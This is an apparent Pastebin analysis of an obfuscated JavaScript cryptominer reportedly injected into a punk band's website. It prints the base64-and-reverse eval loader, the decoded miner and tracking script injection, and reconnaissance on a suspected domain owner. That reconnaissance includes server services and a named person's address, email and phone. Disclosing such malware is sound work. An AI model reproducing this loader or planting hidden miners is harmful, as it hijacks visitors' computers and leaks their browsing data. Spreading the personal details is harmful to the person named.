API tools faq
paste
Advertisement
NicolaiS

Punkrock band Anti-flag runs Bitcoin mining javascript

NicolaiS
Feb 4th, 2013
434
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 5.35 KB | None | 0 0
raw download clone embed print report
  1. /* //////////////////////////////////////////////////////////////////////////////
  2.     URL:    http://www.anti-flag.com/?page_id=46
  3.     What:   BitcoinPlus.com Miner
  4.  
  5. (Code in bottom of page):
  6. ////////////////////////////////////////////////////////////////////////////// */
  7. var _001='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKs90ToQGbph2Qk5WZwBXYuATSx8lC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACMJFzXgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuI3b0F2YzVnZi9GbtRHaukGch9yL6AHd0h2Jg0DIjJ3cuw2TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ACbP9EIyFmd7cSRzUCdwlmcjN3LDNTJ5ITJyITJ3QjMyIDNxIjMyUCOyUicl5WaNNXdsBlbp92Y0lmQFNTJyITJ0BXayN2chZXYq9Cd4VGdyITJENTJlBXe0BjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLyVmbp12Lzp2Lt92YuMXdsBnbp92Y0lmYuc3d39yLBNTJwRHdoJjMlQ0MlMmczBjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLulWbuknclVXcq9SMuYjLx8SeyVWdxp2LzJWas9CehpWYv02bj5ycpBXYlx2Zv92ZugXYqF2LvE0MlAHd0hmMyUCRzUyYyNHMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
  8. var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];
  9.  
  10. function IOO(data){
  11.     var OO0lOI=_0x84de[0];
  12.     var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];
  13.     do{
  14.         h1=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
  15.         h2=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
  16.         h3=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
  17.         h4=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
  18.         bits=h1<<18|h2<<12|h3<<6|h4;
  19.         o1=bits>>16&0xff;
  20.         o2=bits>>8&0xff;
  21.         o3=bits&0xff;
  22.         if(h3==64){
  23.             enc+=String[_0x84de[4]](o1);
  24.         }else{
  25.             if(h4==64){
  26.                 enc+=String[_0x84de[4]](o1,o2);
  27.             }else{
  28.                 enc+=String[_0x84de[4]](o1,o2,o3);
  29.             };
  30.         };
  31.     }
  32.     while(i<data[_0x84de[5]]);
  33.     return enc;
  34. };
  35.  
  36. function OO0(string){
  37.     var ret=_0x84de[1],i=0;
  38.     for(i=string[_0x84de[5]]-1;i>=0;i--){
  39.         ret+=string[_0x84de[2]](i);
  40.     };
  41.     return ret;
  42. };
  43.  
  44. eval(IOO(OO0(_001)));
  45.  
  46.  
  47. /* //////////////////////////////////////////////////////////////////////////////
  48.     Unpacking & Renaming:
  49. ////////////////////////////////////////////////////////////////////////////// */
  50. var _obfuscated='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKs90ToQGbph2Qk5WZwBXYuATSx8lC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACMJFzXgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuI3b0F2YzVnZi9GbtRHaukGch9yL6AHd0h2Jg0DIjJ3cuw2TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ACbP9EIyFmd7cSRzUCdwlmcjN3LDNTJ5ITJyITJ3QjMyIDNxIjMyUCOyUicl5WaNNXdsBlbp92Y0lmQFNTJyITJ0BXayN2chZXYq9Cd4VGdyITJENTJlBXe0BjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLyVmbp12Lzp2Lt92YuMXdsBnbp92Y0lmYuc3d39yLBNTJwRHdoJjMlQ0MlMmczBjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLulWbuknclVXcq9SMuYjLx8SeyVWdxp2LzJWas9CehpWYv02bj5ycpBXYlx2Zv92ZugXYqF2LvE0MlAHd0hmMyUCRzUyYyNHMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
  51.  
  52. function unpack1(data){
  53.     var chars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  54.     var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc="";
  55.     do{
  56.         h1=chars.indexOf(data.charAt(i++));
  57.         h2=chars.indexOf(data.charAt(i++));
  58.         h3=chars.indexOf(data.charAt(i++));
  59.         h4=chars.indexOf(data.charAt(i++));
  60.         bits=h1<<18|h2<<12|h3<<6|h4;
  61.         o1=bits>>16&0xff;
  62.         o2=bits>>8&0xff;
  63.         o3=bits&0xff;
  64.         if(h3==64){
  65.             enc+=String.fromCharCode(o1);
  66.         }else{
  67.             if(h4==64){
  68.                 enc+=String.fromCharCode(o1,o2);
  69.             }else{
  70.                 enc+=String.fromCharCode(o1,o2,o3);
  71.             };
  72.         };
  73.     }while(i<data.length);
  74.     return enc;
  75. };
  76.  
  77. function unpack2(string){
  78.     var ret="",i=0;
  79.     for(i=string.length-1; i>=0; i--){
  80.         ret += string.charAt(i);
  81.     };
  82.     return ret;
  83. };
  84.  
  85. eval(unpack1(unpack2(_obfuscated)));
  86.  
  87.  
  88. /* //////////////////////////////////////////////////////////////////////////////
  89.     Let's find the person behind (running the "eval"):
  90. ////////////////////////////////////////////////////////////////////////////// */
  91. var _escape='<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script><script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script><script type="text/javascript">BitcoinPlusMiner("21422247")</script>';
  92. var OOl = document.createElement('script');
  93. OOl.src = 'http://api.htmlobfuscator.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
  94. var _1I0 = document.getElementsByTagName('head')[0];
  95. _1I0.appendChild(OOl);
  96. document.write(unescape(_escape));
  97.  
  98. /*
  99.     BitcoinPlusMiner("21422247")
  100.     Which is someone using the name "John R."
  101.    
  102.  
  103.  
  104.  
  105.     *COULD _MAYBE_ BE THE OWNER OF THIS DOMAIN*
  106.     virtuoso-luxury.info
  107.         /go.php?sid=1 (<-- redirect to got.php)
  108.         /got.php?sid=1 (<-- redirect to google)
  109.         login.php (<-- blank page)
  110.         /panel/ (<-- https = ISPmanager-Pro control panel)
  111.        
  112.     https://virtuoso-luxury.info
  113.         -> HTTP: nginx/0.8.54, PHP/5.2.17
  114.         -> SSL Cert: atservers.net
  115.             --> Tyagunov, Oleg  oleg@active.by
  116.             --> per. 2-j Velosipednyj., dom 32, ofis 8
  117.             --> Minsk,  220033
  118.             --> +375.293777935
  119.         -> SMTP: ru109.activeby.net
  120.         -> FTP: Pure-FTPd
  121.         -> SSH: SSH-1.99-OpenSSH_4.3
  122.         -> MySQL: Remote login allowed (not vuln. to CVE-2012-2122)
  123. */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!